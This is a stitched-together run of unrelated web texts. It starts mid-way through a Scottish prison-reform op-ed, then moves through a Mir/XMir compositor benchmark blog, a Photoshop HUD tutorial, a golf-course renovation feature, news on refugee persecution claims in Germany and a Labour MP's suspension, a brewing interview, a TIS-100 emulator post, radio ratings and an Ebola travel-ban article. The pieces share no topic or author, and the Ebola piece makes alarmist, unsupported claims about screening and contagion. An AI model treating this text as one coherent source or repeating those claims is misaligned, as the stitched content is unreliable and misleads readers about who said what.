Attempts have been made to rectify this somewhat , but a presumption half-heartedly put in place in 2010 against these short sentences has resulted in little change to incarceration statistics . Scotland 's offenders also derive overwhelmingly from deprived areas and backgrounds , putting another of the independence movement 's priorities – tackling poverty – into focus . Our prisons do not exist in a vacuum , independent of the sociological factors which affect citizens beyond its walls , and so we must engage with the issues outside to correct what happens inside .
“ The UK has the largest prison population per head in western Europe , and Scotland sees some of the highest reoffending rates . ”
The disastrously counterproductive nature of Scotland 's drug policy is not a new conversation to be had , but one for another day – yet the alternatives to jail time have a significance reaching well beyond drug convictions . Community-focused services must be invested in with an enthusiasm which suggests they are truly seen as a viable method of crime management ; as much an ideological shift as a financial one .
As much as some efforts have been made to promote the rights of prisoners by the Scottish prison service and governing bodies , a powerful catalyst such as independence for Scotland seems necessary to achieve full commitment to rehabilitation . And as independence becomes an appealing prospect to some as a means of remaining within the European Union , perhaps we should take cues from the more successful of our European neighbours ' prison systems .
Germany , for example , runs many facilities which would horrify those who feel that conditions within our prisons are already too lenient – housing resembling bedrooms more than concrete cells , the freedom to decorate said rooms as they wish , and cooking facilities within the rooms for preparing their own meals . These are privileges dependent on good behaviour , but as regularly given to the most violent offenders as the most menial . There is a culture of mutual respect within these prisons which results in a strikingly low rate of incidents within facilities , and one that produces a reoffending rate which is just a fraction of our own .
“ Our prisons do not exist in a vacuum , independent of the sociological factors which affect citizens beyond its walls , and so we must engage with the issues outside to correct what happens inside . ”
The range of in-house classes for inmates is vast , it is within their rights to visit with family , they work jobs off-site and unsupervised ( relatively early in their sentences ) , and prison officers are generally mental health or social work professionals who assist inmates in their personalised counselling plans . Germany invested both money and an interest in developmental autonomy into its prison system and benefited ( as well as saving money in the long run ) ; we should follow suit . A deeper understanding of our offenders is necessary before we punish them .
This really is the problem : punishment . A justice system approached as a tool for retribution rather than rehabilitation is doomed to exacerbate the issues it aims to eradicate . Again , Scottish prisoners do already enjoy some rights which those in rUK do not – the general opportunity to wear their own clothes , for example , minimising the impression that they are being stripped of their personhood as well as their freedom . But fully embracing these principles requires a spark to encourage open mindedness and flexible attitudes . If independence is to be a facilitator for radical change , our offenders must not go forgotten .
“ Germany invested both money and an interest in developmental autonomy into its prison system and benefited ( as well as saving money in the long run ) ; we should follow suit . ”
The question of whether or not the people of Scotland would be in support of such a shift is difficult to answer . It 's something of a comforting , convenient and widely held belief that we are drastically further to the left than our friends in rUK , but surveys done on crime-related issues tell a different story . Scotland , for example , has typically always demonstrated a notably higher rate of support for the reintroduction of capital punishment than England .
But for those of us in full support of prison reform , independence presents a welcome opportunity to rebuild the structure of our country from the ground up .
A society is best measured by the treatment of its most troubled citizens . As has been bellowed throughout the independence movement for a long time – challenge should not be automatic grounds to dismiss a chance to evolve .
This is the first article in a series of blog posts on Mir 's and XMir 's performance . The idea is to provide further insights into the overall performance work , point out existing bottlenecks and how the team is addressing them .
Our overall goal for Mir and XMir is to provide an absolutely fluid user experience , both in the case of typical desktop usage and in the case of more demanding usage scenarios like 3D gaming . More to this , our efforts to provide a fluent user-experience on the desktop should at most have a minimal impact on overall 3D application performance .
During the last weeks and months , a lot of people have raised the question if and to what degree the introduction of a system-level compositor impacts graphical performance . The short answer is : Yes , any additional layer between the GPU and the actual rendering process has an impact on the overall performance characteristics of the system . However , there are ways to avoid most of the overhead and this blog post is the not-so-short answer to the initial question .
As its name implies , a compositor is responsible for taking multiple buffer streams or surfaces and assembling ( a.k.a . compositing ) a final image that is then scanned out to the connected monitors . In the general case , composition requires buffering of the final image and it requires GPU resources to render the individual surfaces to the destination buffer in preparation for scanout . Here , the destination buffer is the framebuffer . The overhead of a system-level compositor can be summarized as this additional rendering step in the overall graphic pipeline , for the obvious benefit of being able to control the final output and enabling flicker-free boot , shutdown , resume , suspend and session-switching .
Both internally and externally , people have been measuring the overall performance impact with XMir as available from the archive today . Roughly speaking , people have been reporting a performance impact of ~20 % in the Phoronix test suite and the question becomes : How can we significantly decrease the impact in the specific case of XMir while still keeping all the aforementioned benefits in place ? The underlying idea to solve the issue is straightforward : If the compositor is clever enough , it could recognize situations where an opaque client surface does cover a complete output ( XMir matches exactly this configuration ) . In that case , composition can be avoided and the client should be provided with a framebuffer as rendering target instead of the usual graphic memory buffer . Moreover , the server-side composition strategy can be smart , and completely skip the final composition step and scan out the framebuffer as soon as the client signals “ done ” . Luckily , Mir 's composition engine and associated buffer allocation/swapping infrastructure allows for implementing this behavior easily and transparently to the client . The respective implementation has been living in https : //code.launchpad.net/~vanvugt/mir/bypass for some time now , and we have been testing it in parallel to trunk . Our primary test and benchmarking platform was Intel , and we have n't seen any issues with the patch on that platform . There is a graphical glitch present on ATI cards that we are actively working on . Nouveau gives us some headache as it is quite slow both on X and XMir right now . However , we are confident that we wo n't see any major issues in XMir once the underlying cause in the Nouveau driver is fixed .
Results
Measuring graphical performance and developing meaningful benchmarks is a complex task on its own . Luckily , we have some pretty capable tooling available in the opensource world . During development and evaluation of the bypass feature , we have been relying on selected test-cases of Phoronix Test Suite and on glmark2 to continuously evaluate performance gains and overall impact . We are going to publish the results across Intel , NVIDIA and AMD GPUs as part of our regular QA reporting at http : //reports.qa.ubuntu.com/graphics/ as soon as we hit trunk . In summary , we are able to reduce XMir 's total overhead to ~6 % on Nexuiz and OpenArena ( see section “ Conclusions and Future Work ” for reasons for and approaches to further reduce the remaining overhead ) . Please also note that we are actively investigating into the results for the “ QGears2 : OpenGL + Image scaling ” test case :
GUI Toolkits – Intel 2500 GUI Toolkits – Intel 3000 GUI Toolkits – Intel 4000 Nexuiz HDR Off Nexuiz HDR On OpenArena
GLMark2 numbers are not yet reported via the public dashboard but we are actively working on wiring them up as part of our daily quality efforts , too . However , the numbers are quite promising as can be seen from this preview ( Lenovo x220 , i7 vPro , Intel ( R ) HD Graphics 3000 ) :
Conclusions & Future Work
Today , we are landing an important GPU-bound optimization for the XMir use-case with the bypass feature and we see significant performance improvements in our benchmarking scenarios . Everyday users will hardly notice any difference in graphical performance , but notice a decrease in power usage on laptops due to the system-compositor requiring less GPU and CPU cycles to carry out its tasks .
However , this is only the first step and we still see some overhead in the benchmarks . Our GLMark2 benchmark numbers for raw Mir when compared to X as in Saucy today suggest that we still have GPU-bound optimization potential that we should leverage in the XMir case . The unity-system-compositor performance is not the bottleneck in this specific scenario and we need to become more clever on the X side of things . In summary , we need to propagate the bypass approach further down into the X world and its clients with X/Compiz handing out the raw buffer provided by Mir to fullscreen , opaque X clients . Luckily , Compiz already knows about the notion of composite bypass , too and the remaining optimization potential lies mostly within X itself by making it more aware of the fact that it is living in a world of nested compositors now . Quite likely , though , Mir will require adjustments , too , to expose composition bypass end-to-end in the XMir scenario . Stay tuned , we will keep you posted within this series of blog posts .
[ Update ] Michael of Phoronix found out that some games , when run in fullscreen mode but not at native resolution , do not benefit from composition bypass . As mentioned in one of the comments , we are now starting to investigate into this sort of issues and will come back with updates once we identified the root causes . At any rate : Thanks for bringing it up , we will make sure that the respective benchmark/setup is present in our benchmarking setup , too .
Advertisements
Now you can also become Iron Man and there is no need to be a genius for that . All you need some basic knowledge of Photoshop or After Effects and our Iron Man HUD Template . With this free Iron Man HUD Template . You can transform yourself or your friends into Iron Man and that too in just minutes . You can check out an image below , where i used the template and amazed my friend by transforming him into Iron Man .
This Template is basically a PNG image with all the interface and display 's build into it along with partial transparency . So , all you have to do is take a portrait of yourself or your friend , do some masking of the face and place this PNG template on top of it and its done . Is n't it really simple .
DOWNLOAD
How to use the Iron Man HUD Template
To create a very Cool Iron Man Hud Photograph .
Create a new composition and it imports the Iron Man HUD Template as well as a portrait photograph which you want to use with this template . Make sure you place the Portrait beneath the Iron Man HUD Template . Adjust the Face Layer by rotating it and scaling it a bit , make sure the right eye coincides with the eye piece of the HUD . Now , create a mask around the face since we only need the center of the face and not the background . To do that , use the Pen tool and create a mask on the Face layer as i have created in the image below , Make sure you create the mask on the face layer only and not on the Template layer . Now Click on the face layer to select it and press F on your keyboard , this will bring out the Mask Feather options , Feather out the mask a bit to remove the sharp edges . Now , we have to create a black background , to that that , go into Layer > New > Solid and create a black solid , make sure it is comp size and place the black solid layer beneath all the other layers and shown below . It will create a black background in your image . You can also do some basic color correction on the face layer , Go to Effect > Color Correction > Curves , Add the curves adjustment and adjust it according to your own taste . You can also use the Hue/Saturation filter to saturate and de-saturate the face layer . Again go into Effect > Color Correction > Hue/Saturation and adjust the Master Saturation accordingly .
Now we have our final image , you can experiment yourself till you are fully satisfied with your work and then Render it out . Upload it on the Social Networks and amaze your friends . Do email me your creation at lessons @ editingcorp.com or post on my Facebook Page and i will feature them here on the Blog as well as on Facebook .
Four months into his renovation of the Torrey Pines North Course , Tom Weiskopf is already getting a bit sentimental .
Driving around the La Jolla site in a cart last week , on a rare sunny morning in June , Weiskopf reflected on the work being done and said wistfully , “ It 's been a really beautiful experience for me . I 'm not looking forward to when it 's over , because I 've really enjoyed it . ”
Weiskopf , 73 , has poured himself into this project as much as any of his more than 60 others . He and his wife , Laurie , temporarily moved to San Diego after the first of the year , and the 16-time PGA Tour winner and British Open champion has been immersed daily in the construction ever since .
In his downtime , Weiskopf has found time to play golf at numerous country clubs in the area with his old friend from his pro tour days , John Schroeder , and Weiskopf even hooked up for 18 holes with Phil Mickelson , who got the North project rolling with his original bid before being deemed ineligible to finish it due to state regulations .
It could have been awkward , but Weiskopf said Torrey Pines was n't broached .
“ I was n't going to bring it up , ” Weiskopf said . “ I figured if he had a problem , he would have brought it up , knowing him . But he did n't . ”
Weiskopf was happy last week to provide a tour of the property to show the progress and share thoughts on his philosophy as the project moves forward . After a three-week delay due to finalizing plans with the Coastal Commission , the construction phase began in late February and is scheduled to end sometime in July , followed by the grow-in period .
Regular golfers nervous that Weiskopf might try to make the new North something like the tough South Course can relax . Thus far , he seems to have taken extra consideration for the average duffer .
“ The most important thing is playability , ” Weiskopf said . “ How can the average guy play the hole better than in the past ?
“ The whole reason for doing this is to improve the experience of those 80,000 rounds of public play . That 's the question : How do you make it challenging , fair , interesting , pretty ? All of those things add into what we 're trying to do . ”
Among the themes emerging from the work :
The greens will be significantly larger and flatter .
One of the most effective arguments to redo the course was that the greens were so heavily sloped from back to front that they were difficult to putt at higher speeds , while affording few manageable pin placements .
On average , the new greens will be about 30 percent larger than the old , and their slopes will be no more than about 1.5 percent . There were some that had a 4-percent grade .
The difficult par-3 sixth green – miniature golf-like because of its pitch – is a good example , having been enlarged to 6,200 square feet from 4,500 while the slope is greatly reduced .
There will be hog backs and ridges to divide portions of the greens , but nothing overly severe .
Of the receptiveness of the greens , Weiskopf is fond of saying , “ It 's like Allstate ; you 're in good hands . ”
One big change from the last public presentation , Weiskopf said , is the greens will have a sub-air system ( like Augusta National ) to control the moisture in them . That was added , he said , with money saved from leaving some sections of current cart path instead of rebuilding them .
There are fewer bunkers than on the original North Course , and even fewer than Weiskopf planned . He has settled on either 42 or 43 , down from his first drawing of 50 and from the preexisting total of 60 .
“ The ones that are there are very strategic , ” Weiskopf said . “ You do n't need any more than that when you 're trying to get 80,000 rounds on here . We overdo bunkers anyway . ”
The average player will have to be a bomber to reach any of the fairway bunkers because they 're positioned for the pros . The greenside bunkers are mostly placed on one side , leaving the golfer the ability to make a less penalizing miss on the other side . At most , only one-third of any green is protected in the front by a bunker and that does n't occur very often . There is plenty of space to hit run-up shots .
One key element for Weiskopf was providing about 6 yards of tightly mowed grass around the greens to allow golfers to try a variety of short shots to recover .
The bunkers will be state-of-the-art . Above the drainage pipes is Capillary Concrete , a trademarked , porous surface that maintains the shape of the bunker while ensuring good drainage .
There are significant changes to the old sixth , seventh , eighth and ninth holes – which will become the closing stretch in the flipping of the nines .
Beyond the alterations to the sixth green , Weiskopf admirably was able to eliminate the cart path and turn circle to the right of the hole , removing the chance of an unlucky cart-path bounce . A bunker has been added to the right side of the green .
At the uphill , dogleg right seventh , Weiskopf had issues with the final 30 yards being so severely uphill that it made it difficult for average players to reach the green . He has lowered the green , close to its original position , by a large amount — 8 feet — making it more receptive . Mounding to the right and back of the green will kick balls closer to the putting surface .
“ It 's a hard hole , and I know we made it better , ” Weiskopf said .
The dirt removed at the seventh was used to triple the size of the teeing areas at the downhill sixth .
The eighth and ninth are the only changes in par , with the former becoming a dogleg par-5 that hugs the canyon on the left . The large green is perched well behind the previous back tee for the ninth .
“ It 's a brand-new hole , ” Weiskopf said . “ It 's only 530 ( yards from the back ) and always plays downwind . It 'll be fun ; you just do n't want to go left . ”
The late holes on the original back nine , other than No . 17 , were n't accessible on the day we toured due to heavy construction , but Weiskopf said the goal is to “ hide ” as much as possible the unattractive views of the maintenance yard , driving range and parking lot to the left of 16 , 17 , and 18 .
By all appearances , Weiskopf is going out of his way to put the public golfer first .
“ It 's important to me because I grew up in public golf , on a par-3 course in Ohio , ” he said . “ My parents played public golf . To have this opportunity at Torrey Pines is monumental for me .
“ If I was a kid , I 'd make it a point to get out here and work on my game . You ca n't learn golf any better than on these two courses . And now you 're going to have a brand-new golf course to play . ”
( RNS ) Germany 's refugee crisis is challenging the country 's main religious groups as they try to balance a welcoming attitude to the mostly Muslim migrants and concern for the welfare of the minority Christians among them .
Increasingly , accounts of Muslim migrants ganging up on Christians and other minorities in refugee shelters have raised concerns .
Germany is dealing with an influx of about 1 million newcomers from the Middle East , Asia and Africa .
Scattered media reports since last fall have spoken of radical Muslims harassing Christians and other religious minorities , making them feel threatened and under pressure to convert to Islam .
The issue got national attention in early May when five minority rights groups held a news conference in Berlin to present what they said was widespread persecution of Christians and other religious minorities in refugee centers .
Open Doors Germany , a group affiliated with the international Open Doors movement to help persecuted Christians , presented a report that said 88 percent of the 231 Christian refugees they interviewed reported having suffered religiously motivated persecution in the form of insults , death threats and physical and sexual attacks .
Some felt pressure to convert and reported that Muslims were harassing them by playing loud recordings of Quran chanting . Almost half of them said they were mistreated by security guards , who are mostly Muslim foreigners who speak the refugees ' languages .
Markus Rode , the group 's chairman , said there was an “ atmosphere of fear and panic ” among Christian refugees and the mainstream churches were ignoring the problem .
“ I really did n't know that after coming to Germany I would be harassed because of my faith in the very same way as back in Iran , ” the report quoted one refugee as saying .
Another group , Action for Persecuted Christians , estimated that 40,000 refugees in Germany , mostly Christians , were victims of religious persecution .
“ These are not isolated cases . I do n't know of any refugee shelter from Garmisch to Hamburg where we have not found such cases , ” said Paulus Kurt from the Central Council of Oriental Christians in Germany .
Pastor Gottfried Martens from the evangelical Trinity Church in Berlin , which works closely with Christian converts mostly from Iran and Afghanistan , called for separate shelters for Muslims and Christians .
“ When a house is burning , it 's not enough to talk about fire prevention measures , ” he said . “ You have to pull the people out . ”
The Open Doors Germany report said the authorities should register the religious affiliation of refugees and provide separate housing for Muslims and for Christians and other religious minorities . It also called for more non-Muslim security staff .
Although the news conference attracted media attention , leading German news outlets soon questioned the report 's methodology and the neutrality of the speakers . Der Spiegel newsweekly said Open Doors Germany “ is controversial because it is close to the evangelicals and therefore not nondenominational . ”
After those news reports were published , the Catholic bishops conference said it had surveyed its dioceses around Germany for information about the refugee situation .
“ This survey suggests that intimidation and discrimination ( including violence ) against Christians in refugee centers are not a common problem , but they do come up repeatedly and need to be taken seriously , ” it said in a statement . “ The bishops conference does not think it is possible to quantify the problem . ”
Berlin 's Protestant Bishop Markus Droege said his church took reports of religious persecution of Christians very seriously but did not see a general hostility to them in refugee centers .
A spokesman for the Evangelical Church in Germany , the national association of Protestant churches , rejected the idea of separate shelters according to religion . “ In Germany , there must be religious freedom everywhere and for everyone , and guaranteed by the state , ” he said .
The insistence by the main churches on helping all refugees without stigmatizing some of them has irritated the far-right Alternative for Germany , which has stoked suspicion of Islam to gain support among Germans concerned about the influx of refugees .
A war of words broke out after the party was not invited to attend the Catholic Assembly in Leipzig last month ( May 25-29 ) , a large festival that includes panel discussions between Catholic leaders and prominent politicians .
Alternative for Germany chairwoman Frauke Petry accused the churches of not doing enough for Middle Eastern Christians .
“ Some leaders of German churches speak out more for Muslims than for their co-religionists , ” she charged . “ There is a clear imbalance here . ”
Petr Bystron , the party 's Bavaria chairman , said the churches were profiting “ under cover of loving their neighbor ” by exploiting volunteers to care for refugees while taking in billions of euros in government subsidies for the shelters they run .
“ If this was about belief and not about business , the churches must be skeptical about the influx of Muslims , ” he wrote in an article for the German website of The Huffington Post . “ This show of friendliness to refugees finances a gigantic welfare industry organized under the aegis of the churches . ”
The two main churches dismissed the accusations as ignorant and misguided .
Apart from the refugee work of their charity branches , the main churches have joined Jewish and Muslim organizations in a project to support local interfaith initiatives that help refugees deal with bureaucracy , find homes and jobs , and learn German .
To qualify for government support , all interfaith projects must include one Muslim partner .
At the project 's launch in Berlin on Tuesday ( May 31 ) , senior Interior Ministry official Guenter Krings announced a government subsidy of 500,000 euros ( $ 566,211 ) and said religious groups “ make an important contribution to integrating refugees and strengthening our social cohesion . ”
Abraham Lehrer , vice president of the Central Council of Jews in Germany , told the meeting that interfaith projects were more important than ever because the refugee influx challenged Germans to ask “ how we can peacefully live together in this pluralistic and multireligious society . ”
( Tom Heneghan is a correspondent based in Paris )
Originally Posted on Apr 13 , 2016 Two Thirsty Gardeners is a website documenting the work of two guys , Rich and Nick “ … digging and swigging their way through the seasons .. ” The website initially began as a way of documenting their trials in growing produce and making booze and has continued to grow . Their success has led to a book , Brew It Yourself , which is an easy-to-read and practical guide to brewing , as well as being packed with traditional ( and some not so traditional ) beer , cider and liqueur recipes.Today we are chatting to Nick , finding out a little more about the website and his history of brewing and growing…Myself and the other Thirsty Gardener , Rich , started making cider about ten years ago . He subsequently acquired an allotment site so we thought it would be fun to grow other produce for booze making , chronicling our trials on a website . The site took off so we kept growing and brewing more and more…My parents had a touch of ‘ The Good Life ' about them and grew plenty of fruit and veg in our garden . Seeing small seeds turn into large food-bearing plants is very exciting as a kid and I still find nature 's processes fascinating.Again it 's what my parents did so I 've always had the home brewers curiosity . I remember making carrot wine when I was way too young to drink it , and used to help my dad with his beer kit brewing . Seeing murky liquid burst into bubbly life and eventually clear and become drinkable is another slice of natural magic.Do n't get too caught up with the need to maximise harvests or grow pristine specimens . That aspect can start to turn it from fun into something more competitive ( and costly ) . Stick stuff in the ground , if it grows then rejoice , if it does n't try something else.Lots of research and experimentation . There are flavours that were widely used in the past that we 've forgotten about ( eg . spruce tips are full of vitamin C , so Captain Cook insisted his crew drank spruce beer to fend off scurvy ) ; there are flavour combinations that are common in foreign countries that have been ignored here ( eg . the Basque region of Spain make spirit infusions that combine coffee , vanilla , sloes and aniseed ) ; and messing around with ingredients is great fun.I struggle with pretty much anything that includes bananas . They 're a very popular booze ingredient throughout the world , used widely in wines and beers , but apart from a fairly decent banana and blackberry wine I 've not had much success with them . And it took ages to perfect our recipe for home-made absinthe – early batches were among the foulest things I 've ever drank . ( The one in the book works a treat ! ) Brewing beer is remarkably easy . Start with a beer kit to get a feel for how it all works and assemble the right equipment , then progress to combining malt extracts with other grains and hops before stepping up to all-grain brewing like the professionals . That 's the route I took and would recommend it to anyone . Getting precise timings and temperatures can be tricky , but… good news… it only really matters if you 're desperate to make exactly the same beer every time.I honestly do n't remember , it was so long ago ! When I was a nipper my dad used to help out on a local farm during busy hay bailing times and all the workers would be rewarded with some of the farmer 's cider at the end of the day . I used to tag along and get to sample the cider so that could well have been my first taste . Either that or some of my parents own home brews.Ha ! There is no such thing ! There are plenty of drinks I would never touch because they 're too revolting , but even my worse hangovers have failed to put me off their causes.I 'm quite good at keeping a lid on excessive behaviour and my hangovers have been given more legendary status among my mates than any particular booze-induced antics . However , I did go through a phase of starting drunken congas in foreign bars . They 're a great way to break down social barriers . Due a comeback I think.I 'm going to be really boring here , but I have a retractable pencil which I treat with more respect than pretty much every other item I own . So that 's coming with me along with a large notebook made from decent paper . And the third item , I 'm less bothered about… so how about one of your cases of Belgian Beer ? Orval or Westmalle Tripel . Or maybe some gueuze . Or perhaps I should go for a mixed case…Good news ! If this Q & A has piqued your interest , with thanks to the Two Thirsty Gardeners we are currently offering you the chance to win a copy of Brew It Yourself , alongside a case of mystery UK beers .
Get the biggest politics stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Labour yesterday suspended one of its MPs over allegations of `` inappropriate '' behaviour reported to the party .
Kelvin Hopkins had the party whip removed while an investigation takes place into claims about text messages sent to a young woman .
The 76-year-old has tonight `` absolutely and categorically '' denied allegations of inappropriate conduct made by party activist Ava Etemadzadeh .
The 27-year-old alleges the Luton North MP hugged her tightly and rubbed his crotch against her four years ago .
Ms Etemadzadeh says she informed the whip 's office at the time , and that a local party member contacted the Leader 's office last year to raise concerns about the claims .
Mr Hopkins is alleged to have sent her a message praising her for being “ sweet and good natured ” before adding that a “ nice young man would be lucky to have you as a girlfriend and lover…Were I to be young . ”
( Image : Ava Etemadzadeh/Twitter )
She claimed in an interview with the Telegraph : “ He hugged me to say goodbye , held me too tight and rubbed his crotch on me , which I found revolting . ”
A Labour source said the party had dealt with the allegations that had been brought to them at the time , but that further allegations raised today had resulted in Hopkins suspension .
Labour has since updated its procedures for the reporting and handling of allegations of harassment .
A Labour Party spokesman said : `` On the basis of allegations received by the Labour Party today , Kelvin Hopkins has been suspended from party membership , and therefore the Labour whip , while an investigation takes place .
`` The Labour Party takes all such complaints extremely seriously and has robust procedures in place to deal with them . ''
Mr Hopkins was promoted to Jeremy Corbyn 's Shadow Cabinet in June 2016 , after the informal reprimand , before returning to the backbencher in October the same year .
Mr Hopkins , who lives with his wife , is yet to respond to a request for comment .
It comes as Westminster was rocked by several allegations of sexual misbehaviour and assault from both parties .
( Image : Getty )
On Tuesday activist Bex Bailey came forward with the allegation that she had been raped at a party event , but had been urged by a party official not to report it .
Labour launched an investigation into the allegations , to be handled by a qualified person from outside of the party .
The allegations raised by Ms Etemadzadeh will be investigated internally by the party , not by the independent body looking into the Bex Bailey allegations .
Last month Sheffield Hallam MP Jared O'Mara was suspended from Labour over past homophobic and sexist comments .
In the wake of the recent scandal , Labour has insisted the party has “ robust processes ” to report harassment and is working to improve them .
A spokeswoman said earlier today , before the party named Mr Hopkins : “ We ask that anyone with a complaint comes forward so that a proper investigation can be carried out and when evidence of misconduct comes to light , all appropriate disciplinary action will be taken in line with the Party 's rule book and procedures . ”
Mr Hopkins joined Parliament in 1997 and is one of just a handful of Brexiteers in the Labour party .
Kelvin Hopkins ' 11 point statement in full
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
It is a country known for being a bit fanciful with the truth .
However , even by North Korea 's standards , this news report seems quite remarkable .
This video appears to show the secretive country 's state controlled media telling football fans that its national team has reached the World Cup final .
And , as reported by Metro , the report states the team has done so in style by beating Japan 7-0 , USA 4-0 and China 2-0 .
Most of us with settle down tomorrow night to watch a hopefully entertaining final between Germany and Argentina .
But according to this TV report , North Korea will instead take on Portugal . That would be quite remarkable when you consider that North Korea did n't even qualify for the tournament .
The video shows highlights from old matches and even shows leader Kim Jong-un appearing on a screen in one of Brazil 's fan zones , much to the delight of a cheering crowd .
However , North Korea expert are convinced the video is a FAKE .
One said : `` It looks like somebody has edited together random bits of news archive . ''
Recently I became infatuated with TIS-100 , a game which aptly describes itself as “ the assembly language programming game you never asked for ! ”
The point of the game is to program the ( imaginary ) TIS-100 CPU to solve problems . For example , you might need to take input from two ports and swap them , then write the outputs to two other ports .
The game flies in the face of all modern game design : The first thing you need to do is sit and read a 14 page PDF that outlines the TIS-100 instruction set . And when I say “ read ” , I mean “ learn ” , because a quick skim is not going to cut it ! There are no tutorial levels or handholding . You must read the manual .
After solving the first few problems and feeling good about myself , I approached some of my programmer friends and tried to get them to buy the game so I could compare my solutions to theirs . I swear I tried bringing this up with 3 people and had the exact same conversation :
Them : “ So , it 's a game about programming… ”
Me : “ Yes , it 's so much fun ! ”
Them : “ But I program all day . ”
Me : “ Me too ! ”
Them : “ The last thing I want to do when I come home is program again ”
awkward silence
Them : “ You 're nuts . ”
The rabbit hole goes deeper
Despite not having any close friends to play with , I plowed through the puzzles in the game . One in particular was quite devious ; The TIS-100 is , as I mentioned , an imaginary CPU . And it is clearly designed to be puzzling rather than practical . It has only two registers , and one is a backup that can not be addressed directly . This afformentioned puzzle involved taking the input of two numbers and dividing one by the other . You then output the resulting quotient to one port and the remainder to another .
It was quite fun to work through , but to my dismay my solution was quite inefficient . If I clicked the regular “ Play ” button to execute it is would take several minutes to finish . Even if I ran it in “ Fast ” mode it would take about 5 seconds to complete successfully .
This was obviously unacceptable .
A typical person might call it a day and say , “ well , the real victory is solving the puzzle ! ” . Another , more eccentric person might spend the time figuring out how to optimize their solution so it executes in less time . And then there 's me .
Introducing my TIS-100 emulator
I decided the most logical thing to do was to implement the TIS-100 CPU myself in pure C. This seemed like a good idea to me despite having not used C in about 15 years .
Amazingly , most of the concepts came back fairly quickly . Maybe C is like riding a bike ? Maybe using so much Javascript ( and its C syntax ) kept me on the ball ? I 'm not sure .
I first wrote a parser to input the TIS-100 assembly language as defined in game . It writes it to memory in byte code , which is then interpreted . The resulting performance is really impressive !
The Unity version of TIS-100 that runs on my Mac executes my division program in about 5 seconds , which is an eternity as far as programs go ! My C emulator runs the code in a sleek 0.005s , or roughly 1000x faster !
The full source code is on GitHub , so feel free to download it and check it out . I 'll even accept pull requests as I 'm sure there 's a lot of room for improvement .
Why did I spend my time on this pointless project ?
I try to not use the word “ crazy ” often because I do n't want to trivialize mental illness , but let 's be honest : I have to be the least a little off base to attempt a project like this . Programming is a legitimate hobby of mine . I make a living at it but I also do it in my spare time . TIS-100 was a perfect storm of programming and fun , and I did n't want it to end .
Obivously I 'm not the only one who enjoyed the game , so there is a market for this kind of thing . Maybe this is the long tail of games ?
All I know is I had a lot of fun doing it , and I hope someone has fun with my emulator . Let me know if you do !
The Ticket Sports Radio 's Mike Rhyner speaks during a panel discussion celebrating the 20th anniversary of the station at Dallas Convention Center in Dallas , Texas , Friday , January 24 , 2014 .
The latest sports talk radio ratings have arrived . The January `` book '' ran from Jan. 2 to Jan. 29 .
Among all listeners it was The Ticket with a 3.2 share , followed by ESPN 103.3 and 105.3 at 1.8 .
In the all-important demo which pays the bills -- Men 25-54 : Ticket 6.0 ; ESPN 3.1 ; Fan 2.7 .
In the demo that features the high-priced local talent -- Men 25-54 weekdays from 6 a.m. to 7 p.m. : Ticket 7.6 ; ESPN 3.4 ; Fan 2.3 .
The Ticket took first place in ever weekday hour from 7 a.m. to 7 p.m. ESPN 's Mike and Mike won the 6 a.m. hour . The only hour that The Fan beat out ESPN was 7 a.m. when New School scored a 3.0 to ESPN 's 2.7 .
Only two hours drew double-digit shares in Men 25-54 . The Ticket 's Musers ( George Dunham , Craig Miller , Gordon Keith ) scored a 10.6 at 8 a.m. compared to a combined 4.8 at ESPN ( 3.3 ) and Fan ( 1.5 ) . At 9 a.m. it was Musers at 11.4 versus a combined 5.5 at ESPN ( 3.5 ) and Fan ( 2.0 ) ,
ESPN 's top-rated hours were Fitzsimmons and Friedo at noon and Cowlishaw and Mosley at 4 p.m. Each earned a 4.6 share .
Follow Barry Horn on Twitter at @ bhorn55
Ah , crap . They asked me to be the closing speaker at Webstock . What the hell could I possibly talk about that you have n't heard from the geniuses speaking before me for two days ? What could possibly keep these brilliant minds in the room for one last talk ? For a great finalé , it feels like nothing less than the meaning of life would do . Yeah ! That 's it ! The meaning of life ! I may not be great web designer , but I have figured out the meaning of life , and surprisingly , it 's not sappy at all . In fact I think my fellow Webstock nerds will really appreciate it . So there you go . Come to my closing talk , and find out the answer to the ultimate question of life in 22 minutes or less .
As Americans across the country struggle to understand what is being done to stem the possibility of an Ebola outbreak in the United States , many have come to the conclusion that the first and most effective method of prevention is to keep it out of America to begin with .
That strategy , if there ever was one , has obviously failed now that an infection has been identified on U.S. soil .
This prompted one concerned citizen to launch a petition at the Whitehouse.gov We The People web site calling for a complete ban on air travel to and from Ebola stricken countries .
WE PETITION THE OBAMA ADMINISTRATION TO :
Have the FAA ban all incoming and outgoing flights to ebola-stricken countries until the ebola outbreak is contained The Ebola virus has reached unprecedented epidemic proportions in West Africa , and has been joined by another unrelated concurrent outbreak in the Congo . Experts had stated it was ‘ highly unlikely ' that ebola would show up on American soil . But now it has , in the City of Dallas , Texas , brought here by an individual who entered our country from the West African nation of Liberia , where ebola is rampant . The citizens of the US are scared . We do not want any more ebola-infected individuals bringing the epidemic to our shores . The longer we allow people to enter our country from ebola-stricken areas , the higher the chance another person infected with ebola will arrive here , putting ALL of our citizens at risk . Please tell the FAA to ban ALL incoming flights from any/all ebola-stricken regions . Created : Oct 01 , 2014 ( Petition Link at WhiteHouse.gov )
The publicly posted petition highlights growing concerns that the President , the Centers for Disease Control and medical personnel around the country have failed to develop a clear and concise strategy to prevent the virus from reaching America and isolating it should it be detected in patients on U.S. soil .
Though the CDC maintains that screening procedures for Ebola are in place at the nation 's major travel hubs , it 's clear that the only screenings being conducted are the intrusive TSA security checks that most Americans have been subjected to for several years . Insofar as screenings for those originating their travels in West Africa and arriving in the United States , nothing of the sort is happening .
Ebola Patient Zero Thomas Duncan reportedly boarded a plane in Liberia and lied on his exit questionnaire when he was asked if he had been in contact with any infected people . Duncan traveled on at least three separate airplanes and spent time on layovers during his 23-plus hour journey .
It has been noted that Duncan may have realized he had been in close proximity to the virus and chose to board an airplane so that he could seek better medical care at a U.S. hospital .
In the process , Duncan may have infected scores of others who were in his immediate area at airports , on flights , and when he arrived in the United States .
Current news reports out of Liberia indicate that hundreds of other residents are heading to the airport in the hopes that they can catch a flight out of the country , prompting fears in America that it is only a matter of time before more Ebola infections are identified .
President Obama has thus far maintained that the outbreak does not require travel restrictions .
